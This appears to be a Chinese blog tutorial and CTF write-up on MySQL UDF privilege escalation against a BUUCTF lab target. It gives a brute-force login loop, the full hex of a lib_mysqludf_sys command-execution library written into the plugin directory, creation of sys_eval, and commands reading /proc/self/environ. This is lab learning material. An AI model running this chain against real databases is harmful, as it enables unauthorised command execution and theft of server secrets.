前言

如果你有看过我前面的 SQL 注入 3 文章，你应该会知道标题说的是什么，如果你没有看过，但是想了解什么是UDF提权，查看这篇文章，或许能够有所收获

现在是1月11日的下午，上午算是浪费了，原本是打算用 Manim 制作一个 SQL 注入的演示视频，不过效果不好，尝试用 AI 来生成一个发现效果没有朋友自己手搓的好，但是如果要制作一个长达 40 多分钟的视频，都是用手搓代码来做显然不可能，最后就放弃了这个想法，然后吃了点东西后就开始下午的学习了

UDF概述

什么是UDF：

用户定义函数（User-Defined Function，简称UDF）是一种由用户根据特定需求编写的自定义函数。它不是由数据库或数据处理系统预定义的，而是用户自行编写的，用于执行各种操作，如数据转换、复杂计算、数据聚合等等

UDF的用途：

• 扩展数据库或数据处理系统的功能，执行内置函数不支持的操作
• 用于执行复杂的数学或逻辑计算，这些计算可能涉及多个步骤和条件
• 可以用于数据清洗和转换，如格式化日期、转换字符串或编码数据
• 可以将业务逻辑封装在函数中，使得数据处理更加模块化和可重用
• 通过UDF将复杂的计算逻辑移到数据库服务器上执行，可以减少数据传输和提高性能
• 重点：自定义的函数可以执行系统命令或调用外部程序

UDF的实现方式：

UDF的实现方式取决于它运行的环境，以下是一些常见的UDF实现方式：

• 数据库系统中的UDF：通常用存储过程语言如PL/SQL（Oracle）、T-SQL（SQL Server）或自定义编程语言（如Python、Java）编写
• 大数据处理框架中的UDF：在Hadoop或Spark等大数据处理框架中，UDF可以用Java、Scala、Python等语言编写，并通过API进行注册和使用
• 数据分析工具中的UDF：在数据分析工具如R或Python中，UDF可以通过定义函数的方式实现，并在数据分析脚本中调用

MySQL中的UDF提权

理论：

我们前面已经知道了UDF是用户自定义函数，它是可以执行系统命令的，那么我们就可以使用它来进行提权操作，不过使用UDF提权的条件之一就是可以导入导出文件，但是你可能就疑惑了，我都能导入导出文件了，为什么不直接写入一个Webshell呢还费劲心思的去提权？

第一，Webshell的确可以执行系统命令，但是服务器可能会禁用相关危险函数，举个列子，宝塔面板大家肯定都知道，它就会默认禁用一些PHP的危险函数，那么你即使写入成功了，连接上了，也无法命令执行；第二就是你可能无法在Web目录写入文件，权限不够或者做了限制，这个时候，你就会写入不成功，更不用谈连接，或者你写入的Webshell被检测到直接删除了

当然，还有第三个原因，当我们在拿到网站的Webshell后，会利用操作本身存在的漏洞进行提权，但是有些时候，这些漏洞会被打上补丁，那么使用Webshell就无法提权

这个时候就可以用到UDF提权了，它写入的是.dll或.so的文件，常用c语言编写，然后也不用上传到Web服务的目录，并且如果Mysql服务使用的是高权限用户启动的(root)，那么我们在提权后，就是对应的权限，这里因为c语言我也不会，就暂时不讲怎么去写一个UDF文件了，直接使用 github 上提供的各个版本的UDF文件，下载地址如下：

https://github.com/SafeGroceryStore/MDUT/tree/main/MDAT-DEV/src/main/Plugins/Mysql

在MySQL中想要使用UDF，就需要将UDF文件上传到对应目录，然后创建，并且要确保‑‑skip‑grant‑tables是未开启的，因为该模式是开启的情况下，UDF文件是不会被加载的，不过默认是不开启，所以一旦管理人员疏忽，没有开启，那么我们就可以使用UDF提权了，当然想要上传文件到对应目录，就需要MySQL有允许导入导出文件，同时我们还需要有对数据库mysql的 insert 和 delete 权限，其实是操作里面的func表，所以func表也必须存在

然后将UDF文件上传到对应路径之后，就可以创建函数，再然后就可以调用函数来执行命令了，又因为MySQL可能是高权限用户启动的，所以一旦成功就相当于我们有了与MySQL服务运行账户相同的权限

实践：

接下来还是用那道题目，CVE-2012-2122，buuctf的题目，因为有提供嘛，何必自己折腾环境呢，开启靶机后复制地址，和使用命令连接上mysql：

for i in `seq 1 1000`; do mysql -uroot -pwrong -h node5.buuoj.cn -P 25709 ; done

连接成功后，我们需要做的是，先检查secure_file_priv这个配置：

mysql> show variables like "%secure_file_priv%";
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv |       |
+------------------+-------+
1 row in set (0.12 sec)

secure_file_priv是用来限制load dumpfile、into outfile、load_file() 函数在哪个目录下拥有上传或者读取文件的权限，可以看到这里为空，也就是没有限制；当 secure_file_priv 的值为 null ，表示限制 mysqld 不允许导入|导出，此时无法提权；当 secure_file_priv 的值为 /tmp/ ，表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下，此时也无法提权；当 secure_file_priv 的值没有具体值时，表示不对 mysqld 的导入|导出做限制，此时可提权

然后我们接下来需要查看 plugin 目录：

select @@plugin_dir;
show variables like 'plugin%';

mysql> select @@plugin_dir;
+------------------------------+
| @@plugin_dir                 |
+------------------------------+
| /usr/local/mysql/lib/plugin/ |
+------------------------------+
1 row in set (0.10 sec)

mysql> show variables like 'plugin%';
+---------------+------------------------------+
| Variable_name | Value                        |
+---------------+------------------------------+
| plugin_dir    | /usr/local/mysql/lib/plugin/ |
+---------------+------------------------------+
1 row in set (0.10 sec)

既然我们可以进行导入导出，同时知道了导入导出的路径，接下来就使用SQL语句写入对应的文件即可，先判断系统信息：

mysql> show variables like 'version_compile_%';
+-------------------------+--------+
| Variable_name           | Value  |
+-------------------------+--------+
| version_compile_machine | x86_64 |
| version_compile_os      | Linux  |
+-------------------------+--------+
2 rows in set (0.11 sec)

知道是Linux的x86_64的后，下载一下对应的UDF文件：

0x7F454C4602010100000000000000000003003E0001000000D00C0000000000004000000000000000E8180000000000000000000040003800050040001A00190001000000050000000000000000000000000000000000000000000000000000001415000000000000141500000000000000002000000000000100000006000000181500000000000018152000000000001815200000000000700200000000000080020000000000000000200000000000020000000600000040150000000000004015200000000000401520000000000090010000000000009001000000000000080000000000000050E57464040000006412000000000000641200000000000064120000000000009C000000000000009C00000000000000040000000000000051E5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000250000002B0000001500000005000000280000001E000000000000000000000006000000000000000C00000000000000070000002A00000009000000210000000000000000000000270000000B0000002200000018000000240000000E00000000000000040000001D0000001600000000000000130000000000000000000000120000002300000010000000250000001A0000000F000000000000000000000000000000000000001B00000000000000030000000000000000000000000000000000000000000000000000002900000014000000000000001900000020000000000000000A00000011000000000000000000000000000000000000000D0000002600000017000000000000000800000000000000000000000000000000000000000000001F0000001C0000000000000000000000000000000000000000000000020000000000000011000000140000000200000007000000800803499119C4C93DA4400398046883140000001600000017000000190000001B0000001D0000002000000022000000000000002300000000000000240000002500000027000000290000002A00000000000000CE2CC0BA673C7690EBD3EF0E78722788B98DF10ED871581CC1E2F7DEA868BE12BBE3927C7E8B92CD1E7066A9C3F9BFBA745BB073371974EC4345D5ECC5A62C1CC3138AFF36AC68AE3B9FD4A0AC73D1C525681B320B5911FEAB5FBE120000000000000000000000000000000000000000000000000000000003000900A00B0000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000E0000000120000000000000000000000DE01000000000000790100001200000000000000000000007700000000000000BA0000001200000000000000000000003504000000000000F5000000120000000000000000000000C2010000000000009E010000120000000000000000000000D900000000000000FB000000120000000000000000000000050000000000000016000000220000000000000000000000FE00000000000000CF000000120000000000000000000000AD00000000000000880100001200000000000000000000008000000000000000AB010000120000000000000000000000250100000000000010010000120000000000000000000000DC00000000000000C7000000120000000000000000000000C200000000000000B5000000120000000000000000000000CC02000000000000ED000000120000000000000000000000E802000000000000E70000001200000000000000000000009B00000000000000C200000012000000000000000000000028000000000000008001000012000B007A100000000000006E000000000000007500000012000B00A70D00000000000001000000000000001000000012000C00781100000000000000000000000000003F01000012000B001A100000000000002D000000000000001F01000012000900A00B0000000000000000000000000000C30100001000F1FF881720000000000000000000000000009600000012000B00AB0D00000000000001000000000000007001000012000B0066100000000000001400000000000000CF0100001000F1FF981720000000000000000000000000005600000012000B00A50D00000000000001000000000000000201000012000B002E0F0000000000002900000000000000A301000012000B00F71000000000000041000000000000003900000012000B00A40D00000000000001000000000000003201000012000B00EA0F0000000000003000000000000000BC0100001000F1FF881720000000000000000000000000006500000012000B00A60D00000000000001000000000000002501000012000B00800F0000000000006A000000000000008500000012000B00A80D00000000000003000000000000001701000012000B00570F00000000000029000000000000005501000012000B0047100000000000001F00000000000000A900000012000B00AC0D0000000000009A000000000000008F01000012000B00E8100000000000000F00000000000000D700000012000B00460E000000000000E800000000000000005F5F676D6F6E5F73746172745F5F005F66696E69005F5F6378615F66696E616C697A65005F4A765F5265676973746572436C6173736573006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974007379735F6765745F6465696E6974007379735F657865635F6465696E6974007379735F6576616C5F6465696E6974007379735F62696E6576616C5F696E6974007379735F62696E6576616C5F6465696E6974007379735F62696E6576616C00666F726B00737973636F6E66006D6D6170007374726E6370790077616974706964007379735F6576616C006D616C6C6F6300706F70656E007265616C6C6F630066676574730070636C6F7365007379735F6576616C5F696E697400737472637079007379735F657865635F696E6974007379735F7365745F696E6974007379735F6765745F696E6974006C69625F6D7973716C7564665F7379735F696E666F006C69625F6D7973716C7564665F7379735F696E666F5F696E6974007379735F657865630073797374656D007379735F73657400736574656E76007379735F7365745F6465696E69740066726565007379735F67657400676574656E76006C6962632E736F2E36005F6564617461005F5F6273735F7374617274005F656E6400474C4942435F322E322E35000000000000000000020002000200020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100000001000100B20100001000000000000000751A690900000200D401000000000000801720000000000008000000000000008017200000000000D01620000000000006000000020000000000000000000000D81620000000000006000000030000000000000000000000E016200000000000060000000A00000000000000000000000017200000000000070000000400000000000000000000000817200000000000070000000500000000000000000000001017200000000000070000000600000000000000000000001817200000000000070000000700000000000000000000002017200000000000070000000800000000000000000000002817200000000000070000000900000000000000000000003017200000000000070000000A00000000000000000000003817200000000000070000000B00000000000000000000004017200000000000070000000C00000000000000000000004817200000000000070000000D00000000000000000000005017200000000000070000000E00000000000000000000005817200000000000070000000F00000000000000000000006017200000000000070000001000000000000000000000006817200000000000070000001100000000000000000000007017200000000000070000001200000000000000000000007817200000000000070000001300000000000000000000004883EC08E827010000E8C2010000E88D0500004883C408C3FF35320B2000FF25340B20000F1F4000FF25320B20006800000000E9E0FFFFFFFF252A0B20006801000000E9D0FFFFFFFF25220B20006802000000E9C0FFFFFFFF251A0B20006803000000E9B0FFFFFFFF25120B20006804000000E9A0FFFFFFFF250A0B20006805000000E990FFFFFFFF25020B20006806000000E980FFFFFFFF25FA0A20006807000000E970FFFFFFFF25F20A20006808000000E960FFFFFFFF25EA0A20006809000000E950FFFFFFFF25E20A2000680A000000E940FFFFFFFF25DA0A2000680B000000E930FFFFFFFF25D20A2000680C000000E920FFFFFFFF25CA0A2000680D000000E910FFFFFFFF25C20A2000680E000000E900FFFFFFFF25BA0A2000680F000000E9F0FEFFFF00000000000000004883EC08488B05F50920004885C07402FFD04883C408C390909090909090909055803D900A2000004889E5415453756248833DD809200000740C488B3D6F0A2000E812FFFFFF488D05130820004C8D2504082000488B15650A20004C29E048C1F803488D58FF4839DA73200F1F440000488D4201488905450A200041FF14C4488B153A0A20004839DA72E5C605260A2000015B415CC9C3660F1F8400000000005548833DBF072000004889E57422488B05530920004885C07416488D3DA70720004989C3C941FFE30F1F840000000000C9C39090C3C3C3C331C0C3C341544883C9FF4989F455534883EC10488B4610488B3831C0F2AE48F7D1488D69FFE8B6FEFFFF83F80089C77C61754FBF1E000000E803FEFFFF488D70FF4531C94531C031FFB921000000BA07000000488D042E48F7D64821C6E8AEFEFFFF4883F8FF4889C37427498B4424104889EA4889DF488B30E852FEFFFFFFD3EB0CBA0100000031F6E802FEFFFF31C0EB05B8010000005A595B5D415CC34157BF00040000415641554531ED415455534889F34883EC1848894C24104C89442408E85AFDFFFFBF010000004989C6E84DFDFFFFC600004889C5488B4310488D356A030000488B38E814FEFFFF4989C7EB374C89F731C04883C9FFF2AE4889EF48F7D1488D59FF4D8D641D004C89E6E8DDFDFFFF4A8D3C284889DA4C89F64D89E54889C5E8A8FDFFFF4C89FABE080000004C89F7E818FDFFFF4885C075B44C89FFE82BFDFFFF807D0000750A488B442408C60001EB1F42C6442DFF0031C04883C9FF4889EFF2AE488B44241048F7D148FFC94889084883C4184889E85B5D415C415D415E415FC34883EC08833E014889D7750B488B460831D2833800740E488D353A020000E817FDFFFFB20188D05EC34883EC08833E014889D7750B488B460831D2833800740E488D3511020000E8EEFCFFFFB20188D05FC3554889FD534889D34883EC08833E027409488D3519020000EB3F488B46088338007409488D3526020000EB2DC7400400000000488B4618488B384883C70248037808E801FCFFFF31D24885C0488945107511488D351F0200004889DFE887FCFFFFB20141585B88D05DC34883EC08833E014889F94889D77510488B46088338007507C6010131C0EB0E488D3576010000E853FCFFFFB0014159C34154488D35EF0100004989CC4889D7534889D34883EC08E832FCFFFF49C704241E0000004889D8415A5B415CC34883EC0831C0833E004889D7740E488D35D5010000E807FCFFFFB001415BC34883EC08488B4610488B38E862FBFFFF5A4898C34883EC28488B46184C8B4F104989F2488B08488B46104C89CF488B004D8D4409014889C6F3A44C89C7498B4218488B0041C6040100498B4210498B5218488B4008488B4A08BA010000004889C6F3A44C89C64C89CF498B4218488B400841C6040000E867FBFFFF4883C4284898C3488B7F104885FF7405E912FBFFFFC3554889CD534C89C34883EC08488B4610488B38E849FBFFFF4885C04889C27505C60301EB1531C04883C9FF4889D7F2AE48F7D148FFC948894D00595B4889D05DC39090909090909090554889E5534883EC08488B05C80320004883F8FF7419488D1DBB0320000F1F004883EB08FFD0488B034883F8FF75F14883C4085BC9C390904883EC08E86FFBFFFF4883C408C345787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D657465720045787065637465642065786163746C792074776F20617267756D656E747300457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E34004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F290000011B033B980000001200000040FBFFFFB400000041FBFFFFCC00000042FBFFFFE400000043FBFFFFFC00000044FBFFFF1401000047FBFFFF2C01000048FBFFFF44010000E2FBFFFF6C010000CAFCFFFFA4010000F3FCFFFFBC0100001CFDFFFFD401000086FDFFFFF4010000B6FDFFFF0C020000E3FDFFFF2C02000002FEFFFF4402000016FEFFFF5C02000084FEFFFF7402000093FEFFFF8C0200001400000000000000017A5200017810011B0C070890010000140000001C00000084FAFFFF01000000000000000000000014000000340000006DFAFFFF010000000000000000000000140000004C00000056FAFFFF01000000000000000000000014000000640000003FFAFFFF010000000000000000000000140000007C00000028FAFFFF030000000000000000000000140000009400000013FAFFFF01000000000000000000000024000000AC000000FCF9FFFF9A00000000420E108C02480E18410E20440E3083048603000000000034000000D40000006EFAFFFFE800000000420E10470E18420E208D048E038F02450E28410E30410E38830786068C05470E50000000000000140000000C0100001EFBFFFF2900000000440E100000000014000000240100002FFBFFFF2900000000440E10000000001C0000003C01000040FBFFFF6A00000000410E108602440E188303470E200000140000005C0100008AFBFFFF3000000000440E10000000001C00000074010000A2FBFFFF2D00000000420E108C024E0E188303470E2000001400000094010000AFFBFFFF1F00000000440E100000000014000000AC010000B6FBFFFF1400000000440E100000000014000000C4010000B2FBFFFF6E00000000440E300000000014000000DC01000008FCFFFF0F00000000000000000000001C000000F4010000FFFBFFFF4100000000410E108602440E188303470E2000000000000000000000FFFFFFFFFFFFFFFF0000000000000000FFFFFFFFFFFFFFFF000000000000000000000000000000000100000000000000B2010000000000000C00000000000000A00B0000000000000D00000000000000781100000000000004000000000000005801000000000000F5FEFF6F00000000A00200000000000005000000000000006807000000000000060000000000000060030000000000000A00000000000000E0010000000000000B0000000000000018000000000000000300000000000000E81620000000000002000000000000008001000000000000140000000000000007000000000000001700000000000000200A0000000000000700000000000000C0090000000000000800000000000000600000000000000009000000000000001800000000000000FEFFFF6F00000000A009000000000000FFFFFF6F000000000100000000000000F0FFFF6F000000004809000000000000F9FFFF6F0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000401520000000000000000000000000000000000000000000CE0B000000000000DE0B000000000000EE0B000000000000FE0B0000000000000E0C0000000000001E0C0000000000002E0C0000000000003E0C0000000000004E0C0000000000005E0C0000000000006E0C0000000000007E0C0000000000008E0C0000000000009E0C000000000000AE0C000000000000BE0C0000000000008017200000000000004743433A202844656269616E20342E332E322D312E312920342E332E3200004743433A202844656269616E20342E332E322D312E312920342E332E3200004743433A202844656269616E20342E332E322D312E312920342E332E3200004743433A202844656269616E20342E332E322D312E312920342E332E3200004743433A202844656269616E20342E332E322D312E312920342E332E3200002E7368737472746162002E676E752E68617368002E64796E73796D002E64796E737472002E676E752E76657273696F6E002E676E752E76657273696F6E5F72002E72656C612E64796E002E72656C612E706C74002E696E6974002E74657874002E66696E69002E726F64617461002E65685F6672616D655F686472002E65685F6672616D65002E63746F7273002E64746F7273002E6A6372002E64796E616D6963002E676F74002E676F742E706C74002E64617461002E627373002E636F6D6D656E7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F0000000500000002000000000000005801000000000000580100000000000048010000000000000300000000000000080000000000000004000000000000000B000000F6FFFF6F0200000000000000A002000000000000A002000000000000C000000000000000030000000000000008000000000000000000000000000000150000000B00000002000000000000006003000000000000600300000000000008040000000000000400000002000000080000000000000018000000000000001D00000003000000020000000000000068070000000000006807000000000000E00100000000000000000000000000000100000000000000000000000000000025000000FFFFFF6F020000000000000048090000000000004809000000000000560000000000000003000000000000000200000000000000020000000000000032000000FEFFFF6F0200000000000000A009000000000000A009000000000000200000000000000004000000010000000800000000000000000000000000000041000000040000000200000000000000C009000000000000C00900000000000060000000000000000300000000000000080000000000000018000000000000004B000000040000000200000000000000200A000000000000200A0000000000008001000000000000030000000A0000000800000000000000180000000000000055000000010000000600000000000000A00B000000000000A00B000000000000180000000000000000000000000000000400000000000000000000000000000050000000010000000600000000000000B80B000000000000B80B00000000000010010000000000000000000000000000040000000000000010000000000000005B000000010000000600000000000000D00C000000000000D00C000000000000A80400000000000000000000000000001000000000000000000000000000000061000000010000000600000000000000781100000000000078110000000000000E000000000000000000000000000000040000000000000000000000000000006700000001000000320000000000000086110000000000008611000000000000DD000000000000000000000000000000010000000000000001000000000000006F000000010000000200000000000000641200000000000064120000000000009C000000000000000000000000000000040000000000000000000000000000007D000000010000000200000000000000001300000000000000130000000000001402000000000000000000000000000008000000000000000000000000000000870000000100000003000000000000001815200000000000181500000000000010000000000000000000000000000000080000000000000000000000000000008E000000010000000300000000000000281520000000000028150000000000001000000000000000000000000000000008000000000000000000000000000000950000000100000003000000000000003815200000000000381500000000000008000000000000000000000000000000080000000000000000000000000000009A000000060000000300000000000000401520000000000040150000000000009001000000000000040000000000000008000000000000001000000000000000A3000000010000000300000000000000D016200000000000D0160000000000001800000000000000000000000000000008000000000000000800000000000000A8000000010000000300000000000000E816200000000000E8160000000000009800000000000000000000000000000008000000000000000800000000000000B1000000010000000300000000000000801720000000000080170000000000000800000000000000000000000000000008000000000000000000000000000000B7000000080000000300000000000000881720000000000088170000000000001000000000000000000000000000000008000000000000000000000000000000BC000000010000000000000000000000000000000000000088170000000000009B000000000000000000000000000000010000000000000000000000000000000100000003000000000000000000000000000000000000002318000000000000C500000000000000000000000000000001000000000000000000000000000000

去掉开头的0x，因为是16进制的内容，所以我们还需要解码，然后将文件写入即可：

mysql> select unhex("7F454C46020101...") into dumpfile "/usr/local/mysql/lib/plugin/9527.so";
Query OK, 1 row affected (0.21 sec)

写入成功后，我们就可以创建函数了，在创建之前，我们可以本地查看该文件可以执行哪些函数，这里我用的是我的ubuntu的迷你主机，先将文件内容写入到我迷你主机里面：

echo "7F454C46020101..." | xxd -r -p > 9527.so

然后使用 nm -D 查看，如果没有安装，使用下面命令安装一下就好了：

sudo apt install binutils

然后查看：

fawang@ubuntu-n100:~$ nm -D 9527.so
0000000000201788 A __bss_start
                 w __cxa_finalize@GLIBC_2.2.5
0000000000201788 A _edata
0000000000201798 A _end
                 U fgets@GLIBC_2.2.5
0000000000001178 T _fini
                 U fork@GLIBC_2.2.5
                 U free@GLIBC_2.2.5
                 U getenv@GLIBC_2.2.5
                 w __gmon_start__
0000000000000ba0 T _init
                 w _Jv_RegisterClasses
000000000000101a T lib_mysqludf_sys_info
0000000000000da4 T lib_mysqludf_sys_info_deinit
0000000000001047 T lib_mysqludf_sys_info_init
                 U malloc@GLIBC_2.2.5
                 U mmap@GLIBC_2.2.5
                 U pclose@GLIBC_2.2.5
                 U popen@GLIBC_2.2.5
                 U realloc@GLIBC_2.2.5
                 U setenv@GLIBC_2.2.5
                 U strcpy@GLIBC_2.2.5
                 U strncpy@GLIBC_2.2.5
0000000000000dac T sys_bineval
0000000000000dab T sys_bineval_deinit
0000000000000da8 T sys_bineval_init
                 U sysconf@GLIBC_2.2.5
0000000000000e46 T sys_eval
0000000000000da7 T sys_eval_deinit
0000000000000f2e T sys_eval_init
0000000000001066 T sys_exec
0000000000000da6 T sys_exec_deinit
0000000000000f57 T sys_exec_init
00000000000010f7 T sys_get
0000000000000da5 T sys_get_deinit
0000000000000fea T sys_get_init
000000000000107a T sys_set
00000000000010e8 T sys_set_deinit
0000000000000f80 T sys_set_init
                 U system@GLIBC_2.2.5
                 U waitpid@GLIBC_2.2.5

这里我们使用 sys_eval 函数来执行系统命令，先创建这个函数：

mysql> create function sys_eval returns string soname "9527.so";
Query OK, 0 rows affected (0.11 sec)

成功创建后，我们来使用这个命令：

mysql> select sys_eval("ls");
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| sys_eval("ls")                                                                                                                                                                                                                   |
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 0x3964323331363130343036612E6572720A3964323331363130343036612E7069640A69625F6C6F6766696C65300A69625F6C6F6766696C65310A696264617461310A6D7973716C0A6F75742E6572720A6F75742E7069640A706572666F726D616E63655F736368656D610A74657374 |
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
1 row in set (0.13 sec)

可以看到成功输出了结果，16进制的内容，我们转换一下：

9d231610406a.err
9d231610406a.pid
ib_logfile0
ib_logfile1
ibdata1
mysql
out.err
out.pid
performance_schema
test

这就好了，继续查看根目录：

0x62696E0A626F6F740A6465760A6574630A686F6D650A6C69620A6C696236340A6D656469610A6D6E740A6F70740A70726F630A726F6F740A72756E0A7362696E0A7372760A7379730A746D700A7573720A766172

bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

这个题目的flag在当前进程的环境变量里面可以看到，我之前那篇SQL注入的文章也讲过，直接cat即可：

mysql> select sys_eval("cat /proc/self/environ");
+--+
| sys_eval("cat /proc/self/environ")|
+--+
| 0x4B554245524E455445535F504F52543D7463703A2F2F31302E3234302E302E313A3434334E455445535F534552564943455F504F52543D3434335F484F4D453D2F7573722F6C6F63616C2F6D7973716C414D453D6F7574312F726F6F743D2F7573722F6C6F63616C2F62696E2F6D7973716C645F736166654B554245524E455445535F504F52545F3434335F5443505F414444523D31302E3234302E302E3154483D2F7573722F6C6F63616C2F7362696E3A2F7573722F6C6F63616C2F62696E3A2F7573722F7362696E3A2F7573722F62696E3A2F7362696E3A2F62696E455445535F504F52545F3434335F5443505F504F52543D343433554245524E455445535F504F52545F3434335F5443505F50524F544F3D7463704245524E455445535F534552564943455F504F52545F48545450533D34343345524E455445535F504F52545F3434335F5443503D7463703A2F2F31302E3234302E302E313A3434334B554245524E455445535F534552564943455F484F53543D31302E3234302E302E315057443D2F7573722F6C6F63616C2F6D7973716C2F6461746141473D666C61677B63363163306462352D613661342D343434332D396639362D336335636634633236303333 |
+--+
1 row in set (0.11 sec)


KUBERNETES_PORT=tcp://10.240.0.1:443NETES_SERVICE_PORT=443_HOME=/usr/local/mysqlAME=out1/root=/usr/local/bin/mysqld_safeKUBERNETES_PORT_443_TCP_ADDR=10.240.0.1TH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binETES_PORT_443_TCP_PORT=443UBERNETES_PORT_443_TCP_PROTO=tcpBERNETES_SERVICE_PORT_HTTPS=443ERNETES_PORT_443_TCP=tcp://10.240.0.1:443KUBERNETES_SERVICE_HOST=10.240.0.1PWD=/usr/local/mysql/dataAG=flag{c61c0db5-a6a4-4443-9f96-3c5cf4c26033

上面结果还有很多-符号，为了简洁明了，这里去掉了，然后转换16进制的内容，结果就有flag，当然需要我们手动加上反大括号

/proc/self/environ 它是一个虚拟文件，属于 Linux /proc 文件系统的一部分，主要存储当前进程的所有环境变量，这个案例就是利用UDF提权来获取flag，因为这个案例没有Web服务，直接写入Webshell也是无法连接的，所以只能使用这种方法来执行系统命令，然后获取信息

正常情况下可以用于无法上传Webshell，或者上传的Webshell权限低或无法使用危险函数，这时就可以使用数据库的UDF，用户自定义函数来执行系统命令，获取想要的内容